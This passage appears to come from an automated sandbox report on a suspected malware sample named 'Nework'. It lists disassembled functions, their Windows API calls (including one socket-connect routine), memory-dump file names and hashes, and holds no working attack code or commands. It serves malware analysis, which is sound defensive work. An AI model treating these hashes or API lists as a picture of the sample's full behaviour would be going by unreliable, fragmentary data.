Concurrency::location::_Assign.LIBCMT ref: 001BE70D
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 001BE715

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
String ID:
API String ID: 1924466884-0
Opcode ID: 7e9dd48c4b0b0ee7bc4ac9e3e15676d2f29e8b355db4ca4cb1f4bff7fc58ba7b
Instruction ID: cef2b752d87713d95bb4326d392d7c0c2e36d51b91251c08fe5d5b17e7ef2918
Opcode Fuzzy Hash: 7e9dd48c4b0b0ee7bc4ac9e3e15676d2f29e8b355db4ca4cb1f4bff7fc58ba7b
Instruction Fuzzy Hash: 9B414935A002159FCF05EFA4C894AEDB7F5FF58310F1980A9ED499B282DB30A941CB91

Function 001CFAAF Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00198610,00000000), ref: 001CFAF7
__fassign.LIBCMT ref: 001CFCD6
__fassign.LIBCMT ref: 001CFCF3
WriteFile.KERNEL32(?,00198610,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001CFD3B
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 001CFD7B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 001CFE27

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 1a9ee16d866298c631d1d672401aa5bf29ec624afaa99848cf60cde8a26166e8
Instruction ID: 04d901b60bd8822211619f287a0ea0801d31c110f75ec6a08dbeeb767e498a97
Opcode Fuzzy Hash: 1a9ee16d866298c631d1d672401aa5bf29ec624afaa99848cf60cde8a26166e8
Instruction Fuzzy Hash: 60D16B75D002589FCB15CFE8C890EEDBBB6AF58314F28416DE856AB252D730AD46CB50

Function 001BE73D Relevance: 9.1, APIs: 6, Instructions: 117COMMON

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 001BE77E
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 001BE786
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 001BE7B0
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 001BE7B9
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 001BE83C
Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 001BE844

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Context$Base::$GroupInternalScheduleSegment$AssignAvailableConcurrency::location::_DeferredEventMakeProcessor::ReleaseRunnableSchedulerTraceVirtual
String ID:
API String ID: 3929269971-0
Opcode ID: 56443e272866666c47c60ffac640d693851b9d709975d5efd615e1a95ed2fa63
Instruction ID: a1aaff458fa3c3166fd5b210e4136f7337d3df70b2d141ef2a8febfbd3cce7be
Opcode Fuzzy Hash: 56443e272866666c47c60ffac640d693851b9d709975d5efd615e1a95ed2fa63
Instruction Fuzzy Hash: 1C414035B00615AFCB09DFA8C494AEDB7F5FF48310F058159E9069B790CB74AE41CB81

Function 001AFA7B Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 001AFA89
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 001AFA8F
GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 001AFABC
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 001AFAC6
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 001AFAD8
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 001AFAEE

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
String ID:
API String ID: 2808382621-0
Opcode ID: 854ce92bb0519d2d07434c8a3719907600c337dab29a9f06b3a37997fd710f57
Instruction ID: 912e9161a252ba74af23d9a4e6fc3707ba617f52e9a9bddee0267746c1e0ff0d
Opcode Fuzzy Hash: 854ce92bb0519d2d07434c8a3719907600c337dab29a9f06b3a37997fd710f57
Instruction Fuzzy Hash: B801B139540155ABD711BBE5DC89BFF37A8EF52351B140829F409E6090EB70D945C760

Function 0019DA30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 170COMMON

Download Yara Rule

Strings

list too long, xrefs: 0019DEED

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID:
String ID: list too long
API String ID: 0-1124181908
Opcode ID: 47381237c837bd50a37397070e4fbc0200c3b5024582b077d7d29c1072aa11db
Instruction ID: 8b46f54d1c09eccbe14e6bd8f9f50d3b4fb75fc04e814c328dbb283e52790fce
Opcode Fuzzy Hash: 47381237c837bd50a37397070e4fbc0200c3b5024582b077d7d29c1072aa11db
Instruction Fuzzy Hash: 8B51E575D04758ABDB20DF64CC89BA9F3B8EF25700F004199F90DA7281EB74AA81CF91

Function 001C1687 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 001C16E2
std::invalid_argument::invalid_argument.LIBCONCRT ref: 001C1701
Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 001C1748

Strings

pContext, xrefs: 001C16F9

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$ExecutionFreeIdleProcessorProxy::Root::SpinSuspendThreadUntilVirtualstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 1284976207-2046700901
Opcode ID: c7708e34f894ff30887286889b7cacc1e5284051346846506498bf9decacc774
Instruction ID: 2c641ba63d420ae12dc59a60acebeb7991f4fdb5f1d0504c648b3d0613dbd4ef
Opcode Fuzzy Hash: c7708e34f894ff30887286889b7cacc1e5284051346846506498bf9decacc774
Instruction Fuzzy Hash: 2C21E735780615ABCB09AB68D895FBD73A5BFB6324B05015EF512872D3CFA4EC428E81

Function 001C63CD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,001C63C2,?,?,001C638A,?,?,?), ref: 001C63E2
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001C63F5
FreeLibrary.KERNEL32(00000000,?,?,001C63C2,?,?,001C638A,?,?,?), ref: 001C6418

Strings

CorExitProcess, xrefs: 001C63ED
mscoree.dll, xrefs: 001C63DB

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9ed0c5f94ec8d451863953a1918cee868bc77f033b50fd05ef2ff0f0a3e5f461
Instruction ID: 41fc5ef1504e1b45e5b6a3f847231e62064675222efe1e0c5c9d5dba643f99c8
Opcode Fuzzy Hash: 9ed0c5f94ec8d451863953a1918cee868bc77f033b50fd05ef2ff0f0a3e5f461
Instruction Fuzzy Hash: 06F02030A01228FBCB228BC0CD0DF9EBBB9EB04746F004064F800A51A0CBB0CE81DBA0

Function 001BD990 Relevance: 7.6, APIs: 5, Instructions: 123COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 001BD9C4

Part of subcall function 001B8D8F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 001B8DB0

Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 001BDA23
Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 001BDA49
Concurrency::details::SchedulerBase::ReleaseInternalContext.LIBCONCRT ref: 001BDA69
Concurrency::location::_Assign.LIBCMT ref: 001BDAB6

Part of subcall function 001C118F: Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 001C11D4

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: Context$Base::Concurrency::details::$Internal$Event$AssignBlockingConcurrency::location::_FindNestingPrepareReleaseSchedulerStealerThrowTraceWork
String ID:
API String ID: 1879022333-0
Opcode ID: 6ca75b6953745da0386f722f6f8a502d1f85d05ff9c7b2479055cd6611ac24b7
Instruction ID: e8c72d3e055b3bd8679fc81388a223af07b0e64e69b27f38f119558b1c48e7ba
Opcode Fuzzy Hash: 6ca75b6953745da0386f722f6f8a502d1f85d05ff9c7b2479055cd6611ac24b7
Instruction Fuzzy Hash: 08410F71604210ABCF1EAB64D886BFDBBB9AF55320F094099E4069B282DF34AD44C7E1

Function 001AEB46 Relevance: 7.6, APIs: 5, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 001AEB4D
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 001AEB77

Part of subcall function 001AF23D: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 001AF25A

Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 001AEBF4
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 001AEC26
__freea.LIBCMT ref: 001AEC4C

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__freea
String ID:
API String ID: 2497068736-0
Opcode ID: 238cddff23588f242280a14277c84cb951f646f7234ba66fb093cf77f61bf545
Instruction ID: 728bd47a7010e2d8f1a3e60f0b801e257d13ad4033aaabfece69297248e68cb4
Opcode Fuzzy Hash: 238cddff23588f242280a14277c84cb951f646f7234ba66fb093cf77f61bf545
Instruction Fuzzy Hash: CC318FB9A002058BCB19DFA8C5855ADB7F5EF1A310F25406EE406E7340DB349E06CBA1

Function 0019DC1F Relevance: 7.6, APIs: 5, Instructions: 80networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000000,?,?), ref: 0019DC7C
FreeAddrInfoW.WS2_32(?), ref: 0019DC9D
socket.WS2_32(00000002,00000001,00000000), ref: 0019DCC5
connect.WS2_32(00000000,?,00000010), ref: 0019DCD7
closesocket.WS2_32(00000000), ref: 0019DCF1

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: AddrFreeInfoclosesocketconnectgetaddrinfosocket
String ID:
API String ID: 242599585-0
Opcode ID: 2f4ddc932eb7ca4690f083163cae5e8db6ec1732cb2ff62d0cc9a01f480d59b6
Instruction ID: 972ba39c9edad65d7059376004b1478317073a9ab1e189e2f573a84df57b315a
Opcode Fuzzy Hash: 2f4ddc932eb7ca4690f083163cae5e8db6ec1732cb2ff62d0cc9a01f480d59b6
Instruction Fuzzy Hash: 71219A71D082545BDB259B90EC8AFADB3B8DF28710F10009EF90D9B681D7B5AA809F61

Function 001B9AF5 Relevance: 7.6, APIs: 5, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 001B9AFC
Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 001B9B48
std::bad_exception::bad_exception.LIBCMT ref: 001B9B5E
Concurrency::SchedulerPolicy::_ResolvePolicyValues.LIBCONCRT ref: 001B9BA0
std::bad_exception::bad_exception.LIBCMT ref: 001B9BCA

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: Concurrency::PolicyPolicy::_Schedulerstd::bad_exception::bad_exception$H_prolog3_catchResolveValidValueValues
String ID:
API String ID: 921398678-0
Opcode ID: a5d0461ebec79cb83eaadf723e319192892034522d07669542d576b439039d7b
Instruction ID: bbd5722a0819a5ee409de2e6dfd2dad007f69611c0bf2038f4c6814b5c874058
Opcode Fuzzy Hash: a5d0461ebec79cb83eaadf723e319192892034522d07669542d576b439039d7b
Instruction Fuzzy Hash: FA21C575904508DFCB09EF64EA82DEDBBB4EF15310F20406AF611AB291EB306E02CB51

Function 001CD80E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 001CD9A8

Strings

*?, xrefs: 001CD851

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 361775e34eedbd1bdbc167df2203a07f2afa5a8c808378320acde1b58283f0c3
Instruction ID: 0ed7f9af3e1d93d9d7736aa52a4255309696f5ab04eb962096c38f1b0d938ece
Opcode Fuzzy Hash: 361775e34eedbd1bdbc167df2203a07f2afa5a8c808378320acde1b58283f0c3
Instruction Fuzzy Hash: 1E611A75E002199FDB14DFA8D881AAEFBB5EF68314B25816EE855A7300D731EE41CB90

Function 001C54BB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 001C54E0
CatchIt.LIBVCRUNTIME ref: 001C55C6

Strings

MOC, xrefs: 001C54F2
RCC, xrefs: 001C54FA

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: 1e09c3a3a18c459f9dadb9b2b69296c1b939c813d70ae0e3264338c429e1d436
Instruction ID: 0a48f3a9a88c7098cb9fc116c2a26eb978e4a9bdc789208bd3835f251d857d47
Opcode Fuzzy Hash: 1e09c3a3a18c459f9dadb9b2b69296c1b939c813d70ae0e3264338c429e1d436
Instruction Fuzzy Hash: D5416872900609AFCF16DF94CD81FAEBBB6FF68304F188059F904A6211D735EA90DB51

Function 001CC8E0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 001CC967

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 252ff07006b2f6a787f521d242bcd70294969d1d0532ed7bd0a6630bee3fff95
Instruction ID: 526de51a03aeb26733f9e98a27ae5885a276ce6ab347e99fb9ed51c6f1339df5
Opcode Fuzzy Hash: 252ff07006b2f6a787f521d242bcd70294969d1d0532ed7bd0a6630bee3fff95
Instruction Fuzzy Hash: 30B113329046869FDB15CF68C892FAEBBE5EF65340F14816EE849EB241D734CD41CBA1

Function 001981F0 Relevance: 6.2, APIs: 4, Instructions: 155libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C,?,53C1E996), ref: 00198269
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001982D0
GetProcAddress.KERNEL32(00000000), ref: 001982D7

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID:
API String ID: 3310240892-0
Opcode ID: e50960e2e153c90c383ac980ff1201b7250ff8faf7edd17e67a717cfc3a7c346
Instruction ID: 270903511840cc9857ea626f546369079d2dc68ec8ab523f31724b764d054bf0
Opcode Fuzzy Hash: e50960e2e153c90c383ac980ff1201b7250ff8faf7edd17e67a717cfc3a7c346
Instruction Fuzzy Hash: 4C511571D002089BDF14EB68CD49BEDBB75EB56710F504298E809A73D1EB759BC08B91

Function 001C4A75 Relevance: 6.1, APIs: 4, Instructions: 141COMMON

Download Yara Rule

APIs

TypeidsEqual.LIBVCRUNTIME ref: 001C4AC6
TypeidsEqual.LIBVCRUNTIME ref: 001C4AEB
PMDtoOffset.LIBCMT ref: 001C4B01
PMDtoOffset.LIBCMT ref: 001C4B82

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: EqualOffsetTypeids
String ID:
API String ID: 1707706676-0
Opcode ID: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
Instruction ID: b7973d431cbe7b3061b2b190270ed4a3ba34e3499196d4c09c829b3077c9e8d1
Opcode Fuzzy Hash: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
